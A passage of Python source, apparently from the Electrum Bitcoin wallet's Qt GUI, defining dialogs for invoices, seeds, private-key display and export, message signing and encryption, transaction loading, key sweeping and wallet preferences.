def delete_contacts(self, labels):
if not self.question(_("Remove {} from your list of contacts?")
.format(" + ".join(labels))):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_invoice(self, key):
pr = self.invoices.get(key)
pr.verify(self.contacts)
self.show_pr_details(pr)
def show_pr_details(self, pr):
key = pr.get_id()
d = WindowModalDialog(self, _("Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2])+ self.base_unit() + ' @ ' + x[1], pr.get_outputs()))
grid.addWidget(QLabel(outputs_str), 1, 1)
expires = pr.get_expiration_date()
grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
grid.addWidget(QLabel(pr.get_memo()), 2, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
if expires:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(expires)), 4, 1)
vbox.addLayout(grid)
def do_export():
fn = self.getSaveFileName(_("Save invoice to file"), "*.bip70")
if not fn:
return
with open(fn, 'wb') as f:
data = f.write(pr.raw)
self.show_message(_('Invoice saved as') + ' ' + fn)
exportButton = EnterButton(_('Save'), do_export)
def do_delete():
if self.question(_('Delete invoice?')):
self.invoices.remove(key)
self.history_list.update()
self.invoice_list.update()
d.close()
deleteButton = EnterButton(_('Delete'), do_delete)
vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d)))
d.exec_()
def do_pay_invoice(self, key):
pr = self.invoices.get(key)
self.payment_request = pr
self.prepare_for_payment_request()
pr.error = None # this forces verify() to re-run
if pr.verify(self.contacts):
self.payment_request_ok()
else:
self.payment_request_error()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.config.get("console-history",[])
console.history_index = len(console.history)
console.updateNamespace({'wallet' : self.wallet,
'network' : self.network,
'plugins' : self.gui_object.plugins,
'window': self})
console.updateNamespace({'util' : util, 'bitcoin':bitcoin})
c = commands.Commands(self.config, self.wallet, self.network, lambda: self.console.set_json(True))
methods = {}
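# Expose every public method of commands.Commands in the console namespace,
# wrapping each one so it is dispatched through c._run with the GUI password
# dialog available to commands that require a password.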
def mkfunc(f, method):
return lambda *args: f(method, args, self.password_dialog)
for m in dir(c):
if m[0]=='_' or m in ['network','wallet']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
qtVersion = qVersion()
self.balance_label = QLabel("")
self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.lock_icon = QIcon()
self.password_button = StatusBarButton(self.lock_icon, _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(QIcon(":icons/preferences.png"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(QIcon(":icons/seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
self.status_button = StatusBarButton(QIcon(":icons/status_disconnected.png"), _("Network"), lambda: self.gui_object.show_network_dialog(self))
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def update_lock_icon(self):
icon = QIcon(":icons/lock.png") if self.wallet.has_password() else QIcon(":icons/unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.may_have_password())
self.send_button.setVisible(not self.wallet.is_watching_only())
def change_password_dialog(self):
from electrum.storage import STO_EV_XPUB_PW
if self.wallet.get_available_storage_encryption_version() == STO_EV_XPUB_PW:
from .password_dialog import ChangePasswordDialogForHW
d = ChangePasswordDialogForHW(self, self.wallet)
ok, encrypt_file = d.run()
if not ok:
return
try:
hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
except UserCancelled:
return
except BaseException as e:
traceback.print_exc(file=sys.stderr)
self.show_error(str(e))
return
old_password = hw_dev_pw if self.wallet.has_password() else None
new_password = hw_dev_pw if encrypt_file else None
else:
from .password_dialog import ChangePasswordDialogForSW
d = ChangePasswordDialogForSW(self, self.wallet)
ok, old_password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(old_password, new_password, encrypt_file)
except BaseException as e:
self.show_error(str(e))
return
except:
traceback.print_exc(file=sys.stdout)
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(280)
line2 = QLineEdit()
line2.setFixedWidth(280)
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def show_master_public_keys(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(500, 100)
mpk_list = self.wallet.get_master_public_keys()
vbox = QVBoxLayout()
wallet_type = self.wallet.storage.get('wallet_type', '')
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
vbox.addLayout(grid)
if self.wallet.is_deterministic():
mpk_text = ShowQRTextEdit()
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
def show_mpk(index):
mpk_text.setText(mpk_list[index])
# only show the combobox in case multiple accounts are available
if len(mpk_list) > 1:
def label(key):
if isinstance(self.wallet, Multisig_Wallet):
return _("cosigner") + ' ' + str(key+1)
return ''
labels = [label(i) for i in range(len(mpk_list))]
on_click = lambda clayout: show_mpk(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
else:
vbox.addWidget(QLabel(_("Master Public Key")))
show_mpk(0)
vbox.addWidget(mpk_text)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
self.gui_object.daemon.stop_wallet(wallet_path)
self.close()
os.unlink(wallet_path)
self.show_error("Wallet removed:" + basename)
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(str(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None):
if not data:
return
d = QRDialog(data, parent or self, title)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk, redeem_script = self.wallet.export_private_key(address, password)
except Exception as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
if redeem_script:
vbox.addWidget(QLabel(_("Redeem Script") + ':'))
rds_e = ShowQRTextEdit(text=redeem_script)
rds_e.addCopyButton(self.app)
vbox.addWidget(rds_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Electrum, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(address):
self.show_message(_('Address not in wallet.'))
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
self.show_message(_('Cannot sign messages with this type of address:') + \
' ' + txin_type + '\n\n' + self.msg_sign)
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
try:
signature.setText(base64.b64encode(sig).decode('ascii'))
except RuntimeError:
# (signature) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = bitcoin.verify_message(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
def setText(text):
try:
message_e.setText(text.decode('utf-8'))
except RuntimeError:
# (message_e) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
encrypted = bitcoin.encrypt_message(message, pubkey_e.text())
encrypted_e.setText(encrypted.decode('ascii'))
except BaseException as e:
traceback.print_exc(file=sys.stdout)
self.show_warning(str(e))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, txt):
from electrum.transaction import tx_from_str
try:
tx = tx_from_str(txt)
return Transaction(tx)
except BaseException as e:
self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + str(e))
return
def read_tx_from_qrcode(self):
from electrum import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
except BaseException as e:
self.show_error(str(e))
return
if not data:
return
# if the user scanned a bitcoin URI
if str(data).startswith("bitcoin:"):
self.pay_to_URI(data)
return
# else if the user scanned an offline signed tx
data = bh2u(bitcoin.base_decode(data, length=None, base=43))
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self):
fileName = self.getOpenFileName(_("Select your transaction file"), "*.txn")
if not fileName:
return
try:
with open(fileName, "r") as f:
file_content = f.read()
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
try:
r = self.network.synchronous_get(('blockchain.transaction.get',[txid]))
except BaseException as e:
self.show_message(str(e))
return
tx = transaction.Transaction(r)
self.show_transaction(tx)
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It can not be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(980, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
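# Private keys are derived in a background thread so the dialog stays
# responsive: computing_privkeys_signal updates the progress text and
# show_privkeys_signal fills the text box when finished. The done/cancelled
# flags let the thread stop early if the dialog is closed.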
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)[0]
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(str(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
import json
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
def import_labels(path):
def _validate(data):
return data # TODO
def import_labels_assign(data):
for key, value in data.items():
self.wallet.set_label(key, value)
import_meta(path, _validate, import_labels_assign)
def on_import():
self.need_update.set()
import_meta_gui(self, _('labels'), import_labels, on_import)
def do_export_labels(self):
def export_labels(filename):
export_meta(self.wallet.labels, filename)
export_meta_gui(self, _('labels'), export_labels)
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_("Enter private keys:")))
keys_e = ScanQRTextEdit(allow_multi=True)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk():
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text)
f = lambda: button.setEnabled(get_address() is not None and get_pk() is not None)
on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
keys_e.textChanged.connect(f)
address_e.textChanged.connect(f)
address_e.textChanged.connect(on_address)
if not d.exec_():
return
from electrum.wallet import sweep_preparations
try:
self.do_clear()
coins, keypairs = sweep_preparations(get_pk(), self.network)
self.tx_external_keypairs = keypairs
self.spend_coins(coins)
self.payto_e.setText(get_address())
self.spend_max()
self.payto_e.setFrozen(True)
self.amount_e.setFrozen(True)
except BaseException as e:
self.show_message(str(e))
return
self.warn_if_watching_only()
def _do_import(self, title, msg, func):
text = text_dialog(self, title, msg + ' :', _('Import'),
allow_multi=True)
if not text:
return
bad = []
good = []
for key in str(text).split():
try:
addr = func(key)
good.append(addr)
except BaseException as e:
bad.append(key)
continue
if good:
self.show_message(_("The following addresses were added") + ':\n' + '\n'.join(good))
if bad:
self.show_critical(_("The following inputs could not be imported") + ':\n'+ '\n'.join(bad))
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")
self._do_import(title, msg, self.wallet.import_address)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title, msg = _('Import private keys'), _("Enter private keys")
self._do_import(title, msg, lambda x: self.wallet.import_private_key(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.refresh_headers()
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def settings_dialog(self):
self.need_restart = False
d = WindowModalDialog(self, _('Preferences'))
vbox = QVBoxLayout()
tabs = QTabWidget()
gui_widgets = []
fee_widgets = []
tx_widgets = []
id_widgets = []
# language
lang_help = _('Select which language is used in the GUI (after restart).')
lang_label = HelpLabel(_('Language') + ':', lang_help)
lang_combo = QComboBox()
from electrum.i18n import languages
lang_combo.addItems(list(languages.values()))
try:
index = list(languages.keys()).index(self.config.get("language", ''))
except Exception:
index = 0
lang_combo.setCurrentIndex(index)
if not self.config.is_modifiable('language'):
for w in [lang_combo, lang_label]: w.setEnabled(False)
def on_lang(x):
lang_request = list(languages.keys())[lang_combo.currentIndex()]
if lang_request != self.config.get('language'):
self.config.set_key("language", lang_request, True)
self.need_restart = True
lang_combo.currentIndexChanged.connect(on_lang)
gui_widgets.append((lang_label, lang_combo))
nz_help = _('Number of zeros displayed after the decimal point. For example, if this is set to 2, "1." will be displayed as "1.00"')
nz_label = HelpLabel(_('Zeros after decimal point') + ':', nz_help)
nz = QSpinBox()
nz.setMinimum(0)
nz.setMaximum(self.decimal_point)
nz.setValue(self.num_zeros)
if not self.config.is_modifiable('num_zeros'):
for w in [nz, nz_label]: w.setEnabled(False)
def on_nz():
value = nz.value()
if self.num_zeros != value:
self.num_zeros = value
self.config.set_key('num_zeros', value, True)
self.history_list.update()
self.address_list.update()
nz.valueChanged.connect(on_nz)
gui_widgets.append((nz_label, nz))
msg = '\n'.join([
_('Time based: fee rate is based on average confirmation time estimates'),
_('Mempool based: fee rate is targeting a depth in the memory pool')
]
)
fee_type_label = HelpLabel(_('Fee estimation') + ':', msg)
fee_type_combo = QComboBox()
fee_type_combo.addItems([_('Time based'), _('Mempool based')])
fee_type_combo.setCurrentIndex(1 if self.config.use_mempool_fees() else 0)
def on_fee_type(x):
self.config.set_key('mempool_fees', x==1)
self.fee_slider.update()
fee_type_combo.currentIndexChanged.connect(on_fee_type)
fee_widgets.append((fee_type_label, fee_type_combo))
def on_dynfee(x):
self.config.set_key('dynamic_fees', x == Qt.Checked)
self.fee_slider.update()
dynfee_cb = QCheckBox(_('Use dynamic fees'))
dynfee_cb.setChecked(self.config.is_dynfee())
dynfee_cb.setToolTip(_("Use fees recommended by the server."))
fee_widgets.append((dynfee_cb, None))
dynfee_cb.stateChanged.connect(on_dynfee)
feebox_cb = QCheckBox(_('Edit fees manually'))
feebox_cb.setChecked(self.config.get('show_fee', False))
feebox_cb.setToolTip(_("Show fee edit box in send tab."))
def on_feebox(x):
self.config.set_key('show_fee', x == Qt.Checked)
self.fee_adv_controls.setVisible(bool(x))
feebox_cb.stateChanged.connect(on_feebox)
fee_widgets.append((feebox_cb, None))
use_rbf_cb = QCheckBox(_('Use Replace-By-Fee'))
use_rbf_cb.setChecked(self.config.get('use_rbf', True))
use_rbf_cb.setToolTip(
_('If you check this box, your transactions will be marked as non-final,') + '\n' + \
_('and you will have the possibility, while they are unconfirmed, to replace them with transactions that pay higher fees.') + '\n' + \
_('Note that some merchants do not accept non-final transactions until they are confirmed.'))
def on_use_rbf(x):
self.config.set_key('use_rbf', x == Qt.Checked)
use_rbf_cb.stateChanged.connect(on_use_rbf)
fee_widgets.append((use_rbf_cb, None))
msg = _('OpenAlias record, used to receive coins and to sign payment requests.') + '\n\n'\
+ _('The following alias providers are available:') + '\n'\
+ '\n'.join(['https://cryptoname.co/', 'http://xmr.link']) + '\n\n'\
+ 'For more information, see http://openalias.org'
alias_label = HelpLabel(_('OpenAlias') + ':', msg)
alias = self.config.get('alias','')
alias_e = QLineEdit(alias)
def set_alias_color():
if not self.config.get('alias'):
alias_e.setStyleSheet("")
return
if self.alias_info:
alias_addr, alias_name, validated = self.alias_info
alias_e.setStyleSheet((ColorScheme.GREEN if validated else ColorScheme.RED).as_stylesheet(True))
else:
alias_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
def on_alias_edit():
alias_e.setStyleSheet("")
alias = str(alias_e.text())
self.config.set_key('alias', alias, True)
if alias:
self.fetch_alias()
set_alias_color()
self.alias_received_signal.connect(set_alias_color)
alias_e.editingFinished.connect(on_alias_edit)
id_widgets.append((alias_label, alias_e))
# SSL certificate
msg = ' '.join([
_('SSL certificate used to sign payment requests.'),
_('Use setconfig to set ssl_chain and ssl_privkey.'),
])
if self.config.get('ssl_privkey') or self.config.get('ssl_chain'):
try:
SSL_identity = paymentrequest.check_ssl_config(self.config)
SSL_error = None
except BaseException as e:
SSL_identity = "error"
SSL_error = str(e)
else:
SSL_identity = ""
SSL_error = None
SSL_id_label = HelpLabel(_('SSL certificate') + ':', msg)
SSL_id_e = QLineEdit(SSL_identity)
SSL_id_e.setStyleSheet((ColorScheme.RED if SSL_error else ColorScheme.GREEN).as_stylesheet(True) if SSL_identity else '')
if SSL_error:
SSL_id_e.setToolTip(SSL_error)
SSL_id_e.setReadOnly(True)
id_widgets.append((SSL_id_label, SSL_id_e))
units = ['BTC', 'mBTC', 'bits']
msg = _('Base unit of your wallet.')\
+ '\n1BTC=1000mBTC.\n' \
+ _(' This setting affects the fields in the Send tab')+' '
unit_label = HelpLabel(_('Base unit') + ':', msg)
unit_combo = QComboBox()
unit_combo.addItems(units)
unit_combo.setCurrentIndex(units.index(self.base_unit()))
def on_unit(x, nz):
unit_result = units[unit_combo.currentIndex()]
if self.base_unit() == unit_result:
return
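# Remember the amounts currently entered so they can be re-applied after the
# decimal point changes (see the setAmount loop below).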
edits = self.amount_e, self.fee_e, self.receive_amount_e
amounts = [edit.get_amount() for edit in edits]
if unit_result == 'BTC':
self.decimal_point = 8
elif unit_result == 'mBTC':
self.decimal_point = 5
elif unit_result == 'bits':
self.decimal_point = 2
else:
raise Exception('Unknown base unit')
self.config.set_key('decimal_point', self.decimal_point, True)
nz.setMaximum(self.decimal_point)
self.history_list.update()
self.request_list.update()
self.address_list.update()
for edit, amount in zip(edits, amounts):
edit.setAmount(amount)
self.update_status()
unit_combo.currentIndexChanged.connect(lambda x: on_unit(x, nz))
gui_widgets.append((unit_label, unit_combo))
block_explorers = sorted(util.block_explorer_info().keys())
msg = _('Choose which online block explorer to use for functions that open a web browser')
block_ex_label = HelpLabel(_('Online Block Explorer') + ':', msg)
block_ex_combo = QComboBox()
block_ex_combo.addItems(block_explorers)
block_ex_combo.setCurrentIndex(block_ex_combo.findText(util.block_explorer(self.config)))
def on_be(x):
be_result = block_explorers[block_ex_combo.currentIndex()]
self.config.set_key('block_explorer', be_result, True)
block_ex_combo.currentIndexChanged.connect(on_be)
gui_widgets.append((block_ex_label, block_ex_combo))
from electrum import qrscanner
system_cameras = qrscanner._find_system_cameras()
qr_combo = QComboBox()
qr_combo.addItem("Default","default")
for camera, device in system_cameras.items():
qr_combo.addItem(camera, device)
#combo.addItem("Manually specify a device", config.get("video_device"))
index = qr_combo.findData(self.config.get("video_device"))
qr_combo.setCurrentIndex(index)
msg = _("Install the zbar package to enable this.")
qr_label = HelpLabel(_('Video Device') + ':', msg)
qr_combo.setEnabled(qrscanner.libzbar is not None)
on_video_device = lambda x: self.config.set_key("video_device", qr_combo.itemData(x), True)
qr_combo.currentIndexChanged.connect(on_video_device)
gui_widgets.append((qr_label, qr_combo))
usechange_cb = QCheckBox(_('Use change addresses'))
usechange_cb.setChecked(self.wallet.use_change)
if not self.config.is_modifiable('use_change'): usechange_cb.setEnabled(False)
def on_usechange(x):
usechange_result = x == Qt.Checked
if self.wallet.use_change != usechange_result:
self.wallet.use_change = usechange_result
self.wallet.storage.put('use_change', self.wallet.use_change)
multiple_cb.setEnabled(self.wallet.use_change)
usechange_cb.stateChanged.connect(on_usechange)
usechange_cb.setToolTip(_('Using change addresses makes it more difficult for other people to track your transactions.'))
tx_widgets.append((usechange_cb, None))
def on_multiple(x):
multiple = x == Qt.Checked
if self.wallet.multiple_change != multiple:
self.wallet.multiple_change = multiple
self.wallet.storage.put('multiple_change', multiple)
multiple_change = self.wallet.multiple_change
multiple_cb = QCheckBox(_('Use multiple change addresses'))
multiple_cb.setEnabled(self.wallet.use_change)
multiple_cb.setToolTip('\n'.join([
_('In some cases, use up to 3 change addresses in order to break '
'up large coin amounts and obfuscate the recipient address.'),
_('This may result in higher transaction fees.')
]))
multiple_cb.setChecked(multiple_change)
multiple_cb.stateChanged.connect(on_multiple)
tx_widgets.append((multiple_cb, None))
def fmt_docs(key, klass):
lines = [ln.lstrip(" ") for ln in klass.__doc__.split("\n")]
return '\n'.join([key, "", " ".join(lines)])
choosers = sorted(coinchooser.COIN_CHOOSERS.keys())
if len(choosers) > 1:
chooser_name = coinchooser.get_name(self.config)
msg = _('Choose coin (UTXO) selection method. The following are available:\n\n')
msg += '\n\n'.join(fmt_docs(*item) for item in coinchooser.COIN_CHOOSERS.items())
chooser_label = HelpLabel(_('Coin selection') + ':', msg)
chooser_combo = QComboBox()
chooser_combo.addItems(choosers)
i = choosers.index(chooser_name) if chooser_name in choosers else 0
chooser_combo.setCurrentIndex(i)
def on_chooser(x):
chooser_name = choosers[chooser_combo.currentIndex()]
self.config.set_key('coin_chooser', chooser_name)
chooser_combo.currentIndexChanged.connect(on_chooser)
tx_widgets.append((chooser_label, chooser_combo))
def on_unconf(x):
